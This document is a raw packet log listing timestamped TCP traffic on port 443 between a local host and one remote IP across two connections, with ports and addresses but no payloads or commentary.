Dec 17, 2024 08:38:28.359878063 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.365328074 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.365354061 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.365401983 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.365408897 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.365463018 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.370264053 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.370295048 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.370337963 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.370343924 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.370390892 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.373553991 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.373629093 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.373634100 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.373670101 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.375988007 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.376044035 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.486217022 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.486291885 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.486294985 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.486311913 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.486349106 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.525404930 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.534040928 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.534070969 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.534113884 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.534125090 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.534163952 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.534182072 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.534733057 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.537271976 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.537431955 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.537439108 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.541470051 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.541527033 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.541533947 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.541582108 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.546248913 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.546309948 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.546317101 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.546354055 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.551994085 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.552014112 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.552054882 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.552062035 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.552088022 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.552104950 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.553617954 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.553689003 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.556251049 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.556318045 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.556324959 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.561655998 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.561672926 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.561708927 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.561717033 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.561763048 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.566560984 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.566629887 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.566637993 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.566678047 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.570205927 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.571331978 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.571378946 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.571419001 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.571425915 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.571455002 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.613049030 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.679048061 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.679277897 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.679373980 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.722428083 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.723953962 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.724019051 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.726428986 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.726438046 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.726495981 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.726510048 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.726560116 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.728111982 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.728163004 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.733387947 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.733407021 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.733449936 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.733460903 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.733491898 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.740995884 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.741024971 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.741117001 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.741120100 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.741120100 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.741133928 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.741149902 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.744455099 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.744488955 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.744533062 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.744549990 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.744579077 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.748642921 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.748697996 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.748707056 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.748737097 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.748770952 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.753657103 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.753691912 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.753791094 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.753791094 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.753806114 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.756041050 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.756098986 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.756108999 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.756215096 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.758399963 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.758465052 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.761818886 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.761881113 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.761892080 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.761899948 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.761934996 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.816175938 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.872709990 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.872731924 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.872803926 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.872834921 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.872904062 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.918320894 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.918405056 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.918433905 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.921734095 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.921777010 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.921803951 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.921818018 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.921848059 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.925844908 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.925890923 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.925915956 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.925930023 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.925952911 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.929796934 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.929867983 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.929889917 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.929903030 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.929924011 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.935585022 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.935601950 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.935671091 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.935688019 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.941118956 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.941143036 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.941183090 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.941195965 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.941225052 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.941245079 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.945197105 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.945256948 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.945300102 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.945357084 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.950104952 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.950140953 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.950170040 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.950182915 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.950215101 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.950239897 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.955064058 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.955127001 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.955128908 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:28.955143929 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:28.955192089 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:29.108678102 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:29.108702898 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:29.108756065 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:29.108776093 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:29.108815908 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:29.108839035 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:29.113579988 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:29.113617897 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:29.113657951 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:29.113672018 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:29.113719940 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:29.117183924 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:29.117238045 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:29.117266893 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:29.117281914 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:29.117300987 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:29.117340088 CET	443	49729	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:29.117377996 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:30.070801973 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:33.272619009 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:38.324039936 CET	49729	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:38.409450054 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:38.409495115 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:38.409557104 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:38.410043955 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:38.410056114 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:39.620568991 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:39.628840923 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:39.628859997 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.291522980 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.291575909 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.291604996 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.291635990 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.291642904 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.291668892 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.291691065 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.291709900 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.291836977 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.291842937 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.299849033 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.299918890 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.299925089 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.308257103 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.308288097 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.308316946 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.308322906 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.308423042 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.411145926 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.487669945 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.487730980 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.487750053 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.487776995 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.487822056 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.496057034 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.504456043 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.504482031 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.504503965 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.504523039 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.504590034 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.512801886 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.521159887 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.521220922 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.521228075 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.529572010 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.529619932 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.529624939 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.538041115 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.538084984 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.538100958 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.546370029 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.546513081 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.546534061 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.554748058 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.554800034 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.554805994 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.568619967 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.568670988 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.568677902 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.637048006 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.637109041 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.637136936 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.677942991 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.678056955 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.678111076 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.678118944 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.678241968 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.682960987 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.688018084 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.688050985 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.688064098 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.688069105 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.688138008 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.697912931 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.697918892 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.697969913 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.702660084 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.702706099 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.712223053 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.712234020 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.712308884 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.712312937 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.712330103 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.712371111 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.721863031 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.721870899 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.721916914 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.731395960 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.731404066 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.731455088 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.740988016 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.741056919 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.741061926 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.741117954 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.746014118 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.746117115 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.750703096 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.750765085 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.760154963 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.760246992 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.769737005 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.769867897 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.769877911 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.769932985 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.828289032 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.828886032 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.867418051 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.867646933 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.869882107 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.870031118 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.876993895 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.877060890 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.877068043 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.883980989 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.884058952 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.884064913 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.884234905 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.890495062 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.890610933 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.896049023 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.896128893 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.898305893 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.898376942 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.902787924 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.903098106 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.907196999 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.907459021 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.909461021 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.909564018 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.911777973 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.911987066 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.913954020 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.914089918 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.918467045 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.918550014 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.920756102 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.920821905 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.920942068 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.922923088 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.925175905 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.925299883 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.925306082 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.925604105 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.929757118 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.929933071 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.934143066 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.934221029 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.936492920 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.936588049 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.942001104 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.942945004 CET	49772	443	192.168.2.11	188.114.97.6
Dec 17, 2024 08:38:40.944348097 CET	443	49772	188.114.97.6	192.168.2.11
Dec 17, 2024 08:38:40.944453001 CET	49772	443	192.168.2.11	188.114.97.6
